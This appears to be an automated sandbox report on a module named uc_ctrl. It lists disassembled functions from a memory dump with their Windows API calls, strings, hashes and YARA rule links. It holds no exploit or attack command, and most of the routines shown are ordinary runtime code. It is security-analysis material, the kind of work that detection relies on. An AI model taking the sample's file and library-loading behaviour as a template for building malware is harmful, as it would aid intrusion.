Opcode ID: 9419c8e264e9ffc9a02cc100c2afc61563d0e9fd94c8b5d9184b1195c74b1d96
Instruction ID: 8b7ad1f47ec8927685001d1c2ac0c9eccd7f53e5f1c47f7909652d063b22c7ca
Opcode Fuzzy Hash: 9419c8e264e9ffc9a02cc100c2afc61563d0e9fd94c8b5d9184b1195c74b1d96
Instruction Fuzzy Hash: 86317831545302AADB347B788CD3B7D73A99F46710F280229F4907B1D3CE764E49E666

Function 6CB1E70A Relevance: 18.1, APIs: 12, Instructions: 134memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6CB1E717
GlobalAlloc.KERNEL32(00000002,00000000), ref: 6CB1E76F
GlobalHandle.KERNEL32(00000000), ref: 6CB1E77A
GlobalUnlock.KERNEL32(00000000), ref: 6CB1E783
GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 6CB1E79C
GlobalLock.KERNEL32(00000000), ref: 6CB1E7B1
LeaveCriticalSection.KERNEL32(?), ref: 6CB1E7F8
GlobalHandle.KERNEL32(00000000), ref: 6CB1E80A
GlobalLock.KERNEL32(00000000), ref: 6CB1E811
LeaveCriticalSection.KERNEL32(?), ref: 6CB1E818
EnterCriticalSection.KERNEL32(6CD572D0,00000000,?,?,6CB19F7E,?,?,?,00000000,6CC83C34,00000000), ref: 6CB1E82F
LeaveCriticalSection.KERNEL32(6CD572D0,?,?,6CB19F7E,?,?,?,00000000,6CC83C34,00000000), ref: 6CB1E85B

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Global$CriticalSection$Leave$AllocEnterHandleLock$Unlock
String ID:
API String ID: 2233717024-0
Opcode ID: 5e6173d71f9b69cf8759752531ad668d3d9d238ed5afd16bb5fe38893a2cea43
Instruction ID: 51bf8957195a7a22c8dfce0e91dc967552928a3dd53d773ad9755f6b6260fd25
Opcode Fuzzy Hash: 5e6173d71f9b69cf8759752531ad668d3d9d238ed5afd16bb5fe38893a2cea43
Instruction Fuzzy Hash: C941DF31605385AFD704CF64C88CA6EBBB8FF06316B148629E911C7E40DB71B966CBE1

Function 6CB00BF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 106fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 6CB00C33
PathRemoveFileSpecA.SHLWAPI(?), ref: 6CB00C40
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 6CB00CFE
GetFileSize.KERNEL32(000000FF,00000000), ref: 6CB00D1C
ReadFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 6CB00D71

Strings

\SK.txt, xrefs: 6CB00C46

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: File$CreateModuleNamePathReadRemoveSizeSpec
String ID: \SK.txt
API String ID: 2445516684-2142966246
Opcode ID: 66cb58a05840ac6cd2e39b6397ab92e28a612f2ac1686844e6b809bd10609038
Instruction ID: 2de8c0902a8a69572b2a747b7fcb17a05f522f2ff0183f6f8a8dcee94b50e80d
Opcode Fuzzy Hash: 66cb58a05840ac6cd2e39b6397ab92e28a612f2ac1686844e6b809bd10609038
Instruction Fuzzy Hash: 2B515B70E042AC9FDF25CB64CC45BDEBBB5AB4A314F0482D9D649A7281D7746B88CF90

Function 6CBEE9C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CBEE9CC

Part of subcall function 6CB1FAC0: EnterCriticalSection.KERNEL32(6CD57498,?,?,00000000,?,6CB2063F,00000000,?,?,6CAFF6D7,6CD5244C), ref: 6CB1FAF1
Part of subcall function 6CB1FAC0: InitializeCriticalSection.KERNEL32(00000000,?,?,00000000,?,6CB2063F,00000000,?,?,6CAFF6D7,6CD5244C), ref: 6CB1FB07
Part of subcall function 6CB1FAC0: LeaveCriticalSection.KERNEL32(6CD57498,?,?,00000000,?,6CB2063F,00000000,?,?,6CAFF6D7,6CD5244C), ref: 6CB1FB15
Part of subcall function 6CB1FAC0: EnterCriticalSection.KERNEL32(00000000,?,00000000,?,6CB2063F,00000000,?,?,6CAFF6D7,6CD5244C), ref: 6CB1FB22

GetProfileIntW.KERNEL32(windows,DragMinDist,00000002), ref: 6CBEEA1F
GetProfileIntW.KERNEL32(windows,DragDelay,000000C8), ref: 6CBEEA35

Strings

DragMinDist, xrefs: 6CBEEA14
DragDelay, xrefs: 6CBEEA2A
windows, xrefs: 6CBEEA19, 6CBEEA1E, 6CBEEA2F

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: CriticalSection$EnterProfile$H_prolog3InitializeLeave
String ID: DragDelay$DragMinDist$windows
API String ID: 3965097884-2101198082
Opcode ID: d9b45dbdceee0cea78606bd4e376fb6e5acc8c76e4c920c6b2bcd2f0f7fb5169
Instruction ID: c8bb0fd1621a6fc238cd2bbcdab75adf699938831e55d3531efb45ea59cf813f
Opcode Fuzzy Hash: d9b45dbdceee0cea78606bd4e376fb6e5acc8c76e4c920c6b2bcd2f0f7fb5169
Instruction Fuzzy Hash: 7F0148B0A01700AFEBA0DF788406B0ABEF4BB1A704F84192EE149D7F80E77491008F49

Function 6CB1F24C Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 147COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,?), ref: 6CB1F287
PathFindExtensionW.SHLWAPI(?), ref: 6CB1F2A1

Part of subcall function 6CB1FBBF: __CxxThrowException@8.LIBVCRUNTIME ref: 6CB1FBD3

Strings

.CHM, xrefs: 6CB1F39B
.HLP, xrefs: 6CB1F3A2
.INI, xrefs: 6CB1F3D6

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Exception@8ExtensionFileFindModuleNamePathThrow
String ID: .CHM$.HLP$.INI
API String ID: 1938139466-4017452060
Opcode ID: 757f2982b6f9bf0c627a94ce1b4fee6572d637ad03e3587d80d5cdc51da41132
Instruction ID: d4807a685263b02cff113dfe02c3c1cde46bcf6e1c135cd9953b7d688bbd637a
Opcode Fuzzy Hash: 757f2982b6f9bf0c627a94ce1b4fee6572d637ad03e3587d80d5cdc51da41132
Instruction Fuzzy Hash: 6A51E2B59093889AEB20CB75D844BDB73FCEF44308F50496AD585C3E40EB74E599CB62

Function 6CB4FA50 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003), ref: 6CB4FAAD
VerSetConditionMask.KERNEL32(00000000), ref: 6CB4FAB5
VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 6CB4FAC6
GetSystemMetrics.USER32(00001000), ref: 6CB4FAD7

Part of subcall function 6CB503DD: __EH_prolog3.LIBCMT ref: 6CB503E4
Part of subcall function 6CB503DD: GetSysColor.USER32(00000016), ref: 6CB503ED
Part of subcall function 6CB503DD: GetSysColor.USER32(0000000F), ref: 6CB50400
Part of subcall function 6CB503DD: GetSysColor.USER32(00000015), ref: 6CB50417
Part of subcall function 6CB503DD: GetSysColor.USER32(0000000F), ref: 6CB50423
Part of subcall function 6CB503DD: GetDeviceCaps.GDI32(?,0000000C), ref: 6CB5044B
Part of subcall function 6CB503DD: GetSysColor.USER32(0000000F), ref: 6CB50459
Part of subcall function 6CB503DD: GetSysColor.USER32(00000010), ref: 6CB50467
Part of subcall function 6CB503DD: GetSysColor.USER32(00000015), ref: 6CB50475
Part of subcall function 6CB503DD: GetSysColor.USER32(00000016), ref: 6CB50483
Part of subcall function 6CB503DD: GetSysColor.USER32(00000014), ref: 6CB50491
Part of subcall function 6CB503DD: GetSysColor.USER32(00000012), ref: 6CB5049F
Part of subcall function 6CB503DD: GetSysColor.USER32(00000011), ref: 6CB504AD
Part of subcall function 6CB503DD: GetSysColor.USER32(00000006), ref: 6CB504B8
Part of subcall function 6CB503DD: GetSysColor.USER32(0000000D), ref: 6CB504C3
Part of subcall function 6CB503DD: GetSysColor.USER32(0000000E), ref: 6CB504CE
Part of subcall function 6CB503DD: GetSysColor.USER32(00000005), ref: 6CB504D9
Part of subcall function 6CB503DD: GetSysColor.USER32(00000008), ref: 6CB504E7
Part of subcall function 6CB503DD: GetSysColor.USER32(00000009), ref: 6CB504F2
Part of subcall function 6CB503DD: GetSysColor.USER32(00000007), ref: 6CB504FD
Part of subcall function 6CB503DD: GetSysColor.USER32(00000002), ref: 6CB50508
Part of subcall function 6CB503DD: GetSysColor.USER32(00000003), ref: 6CB50513
Part of subcall function 6CB503DD: GetSysColor.USER32(0000001B), ref: 6CB50521
Part of subcall function 6CB503DD: GetSysColor.USER32(0000001C), ref: 6CB5052F
Part of subcall function 6CB503DD: GetSysColor.USER32(0000000A), ref: 6CB5053D

Part of subcall function 6CB4FEA4: __EH_prolog3_GS.LIBCMT ref: 6CB4FEAE
Part of subcall function 6CB4FEA4: GetDeviceCaps.GDI32(?,00000058), ref: 6CB4FECE
Part of subcall function 6CB4FEA4: DeleteObject.GDI32(00000000), ref: 6CB4FF38
Part of subcall function 6CB4FEA4: DeleteObject.GDI32(00000000), ref: 6CB4FF56
Part of subcall function 6CB4FEA4: DeleteObject.GDI32(00000000), ref: 6CB4FF74
Part of subcall function 6CB4FEA4: DeleteObject.GDI32(00000000), ref: 6CB4FF92
Part of subcall function 6CB4FEA4: DeleteObject.GDI32(00000000), ref: 6CB4FFB0
Part of subcall function 6CB4FEA4: DeleteObject.GDI32(00000000), ref: 6CB4FFCE
Part of subcall function 6CB4FEA4: DeleteObject.GDI32(00000000), ref: 6CB4FFEC

Part of subcall function 6CB4FB37: GetSystemMetrics.USER32(00000031), ref: 6CB4FB45
Part of subcall function 6CB4FB37: GetSystemMetrics.USER32(00000032), ref: 6CB4FB53
Part of subcall function 6CB4FB37: SetRectEmpty.USER32(?), ref: 6CB4FB66
Part of subcall function 6CB4FB37: EnumDisplayMonitors.USER32(00000000,00000000,6CB4F9CB,?,?,00000000,6CB4FAF8), ref: 6CB4FB76
Part of subcall function 6CB4FB37: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 6CB4FB85
Part of subcall function 6CB4FB37: SystemParametersInfoW.USER32(00001002,00000000,?,00000000), ref: 6CB4FBB2
Part of subcall function 6CB4FB37: SystemParametersInfoW.USER32(00001012,00000000,?,00000000), ref: 6CB4FBC6
Part of subcall function 6CB4FB37: SystemParametersInfoW.USER32 ref: 6CB4FBEC

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Color$DeleteObjectSystem$Info$Parameters$Metrics$CapsConditionDeviceMask$DisplayEmptyEnumH_prolog3H_prolog3_MonitorsRectVerifyVersion
String ID:
API String ID: 551326122-0
Opcode ID: fcf15d53eb7510ec4b5b20746b9f1bef0b4d164e507639fb874bd678e41c7c59
Instruction ID: 9898c0697557ae14417630f1be65a555b3df0a1ab0e62ab707667164c569d023
Opcode Fuzzy Hash: fcf15d53eb7510ec4b5b20746b9f1bef0b4d164e507639fb874bd678e41c7c59
Instruction Fuzzy Hash: 7211A3B1A00218ABEB259F759C49FEFBBBCEB8A704F00415DE64597281DBB04A148B90

Function 6CB1F1A9 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

PathFindFileNameW.SHLWAPI(00000000,?,6CB1F2CF,?,?), ref: 6CB1F1B5
_wcslen.LIBCMT ref: 6CB1F1C2
SetErrorMode.KERNEL32(00000000,?,?,6CB19F33,?,00000000,6CC83C34,00000000), ref: 6CB1F1F4
SetErrorMode.KERNEL32(00000000,?,?,6CB19F33,?,00000000,6CC83C34,00000000), ref: 6CB1F200

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: ErrorMode$FileFindNamePath_wcslen
String ID:
API String ID: 2098504600-0
Opcode ID: c50402995ff0de3b43f197c2ddd2b11a15e8f66201f35065ee9b2fb548ce9955
Instruction ID: 16fcbf81caa09f3b997607a7cff7d35a92b32a12f5794c7ba56ff40467b96168
Opcode Fuzzy Hash: c50402995ff0de3b43f197c2ddd2b11a15e8f66201f35065ee9b2fb548ce9955
Instruction Fuzzy Hash: 4E11E371448284AFDB00AF61C808B9E3FA9EF01369F148425F8188BF51CB31C556CBA1

Function 6CB1B9A1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000060,?,?,?,?,?), ref: 6CB1BA24
LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,?,?,?), ref: 6CB1BA38

Strings

LOC, xrefs: 6CB1B9C6

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: LibraryLoad
String ID: LOC
API String ID: 1029625771-519433814
Opcode ID: ad533fbc7a90ceecd03f4268019988abb577c3dacc6c347ce8d869f493fb78cd
Instruction ID: d644dab4880b2f74af380284c78ef7e6071a3887a996cdb9d0dad0285cbfbc00
Opcode Fuzzy Hash: ad533fbc7a90ceecd03f4268019988abb577c3dacc6c347ce8d869f493fb78cd
Instruction Fuzzy Hash: 9D11EB72D15208BBDB109FA8CC44EDE77B8DB05328F440275E6019BF90FE319D288761

Function 6CB1B03C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6CB1B060
PathFindExtensionW.SHLWAPI(?), ref: 6CB1B076

Part of subcall function 6CB1A6A6: __EH_prolog3_GS.LIBCMT ref: 6CB1A6B0

Strings

%Ts%Ts.dll, xrefs: 6CB1B083

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: ExtensionFileFindH_prolog3_ModuleNamePath
String ID: %Ts%Ts.dll
API String ID: 3433622546-1896370695
Opcode ID: cba959c7e3d362380af8887c1fc43e610fb1271aeb3ba0b063d5304ae705e3f9
Instruction ID: 20a598fd6aea0108af69ca0ad25ab4ad90c4847b5638af28142f2d7a49fbcc08
Opcode Fuzzy Hash: cba959c7e3d362380af8887c1fc43e610fb1271aeb3ba0b063d5304ae705e3f9
Instruction Fuzzy Hash: BA01D672A01008ABDB11EBB4DD48AEF77FCEF49304F0104AAD515D7A40EB31EA09CB90

Function 6CB1A6A6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB1A6B0

Part of subcall function 6CB1A044: __EH_prolog3.LIBCMT ref: 6CB1A0F2

Part of subcall function 6CB21A46: GetModuleHandleW.KERNEL32(kernel32.dll,?,?), ref: 6CB21A79
Part of subcall function 6CB21A46: GetProcAddress.KERNEL32(00000000,GetThreadPreferredUILanguages), ref: 6CB21A89
Part of subcall function 6CB21A46: EncodePointer.KERNEL32(00000000,?,?), ref: 6CB21A92

Strings

y, xrefs: 6CB1A702

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: AddressEncodeH_prolog3H_prolog3_HandleModulePointerProc
String ID: y
API String ID: 2515442129-4225443349
Opcode ID: f2a5e6de4cb1589f15ba88a76d7a3144b411a9ee8ac6ea97097488c5e5992145
Instruction ID: 9e49646c07a54cf3379d9d6314c337929a09787c056bf3d10f6509e7ca6b54c9
Opcode Fuzzy Hash: f2a5e6de4cb1589f15ba88a76d7a3144b411a9ee8ac6ea97097488c5e5992145
Instruction Fuzzy Hash: 3E216372C081689BDB21DB64CD40BDD7378AF21718F0042D5E588A6B90DBB49FD8CF91

Function 6CB1EA42 Relevance: 3.0, APIs: 2, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 6CB1FB34: LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,6CB2063F,00000000,?,?,6CAFF6D7,6CD5244C), ref: 6CB1FB48

__CxxThrowException@8.LIBVCRUNTIME ref: 6CB1EA4D

Part of subcall function 6CC56276: RaiseException.KERNEL32(?,?,?,00000001,00000000,?,00000000), ref: 6CC562D5

__EH_prolog3.LIBCMT ref: 6CB1EA5A

Part of subcall function 6CB1FBA5: __CxxThrowException@8.LIBVCRUNTIME ref: 6CB1FBB9

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Exception@8Throw$CriticalExceptionH_prolog3LeaveRaiseSection
String ID:
API String ID: 1434208454-0
Opcode ID: 77ccb400f24666f83c4f446fedb702581249d85514dfab43e95fb0d012e4693e
Instruction ID: 6cb647d0b0471009bd52c64a08e9241ba1fd6963751049d650c50b1d49df6d6c
Opcode Fuzzy Hash: 77ccb400f24666f83c4f446fedb702581249d85514dfab43e95fb0d012e4693e
Instruction Fuzzy Hash: 300184306282C59BEB109F74C458BAD36B1EF41358F605628E5918BF90EF74CA54C795

Function 6CB1B8FE Relevance: 3.0, APIs: 2, Instructions: 39libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,00000060), ref: 6CB1B939
LoadLibraryExW.KERNEL32(?,?,00000002,?,00000060), ref: 6CB1B94D

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5b24761d64c154df00430e5c135009ce7fe624fc417e984a547854349497f88e
Instruction ID: 7d6ea3c6ee93a5317b9652327481accd41e013cef3bd9c8940cda0f9e87840cc
